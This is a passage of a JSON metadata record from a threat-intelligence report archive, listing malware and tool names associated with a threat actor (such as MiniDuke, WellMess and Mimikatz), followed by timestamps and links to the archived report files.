"LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434384, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a90da8d6f7f0c84257a2dc2fdd6f05c86b48bd8f.pdf", "text": "https://archive.orkl.eu/a90da8d6f7f0c84257a2dc2fdd6f05c86b48bd8f.txt", "img": "https://archive.orkl.eu/a90da8d6f7f0c84257a2dc2fdd6f05c86b48bd8f.jpg" } }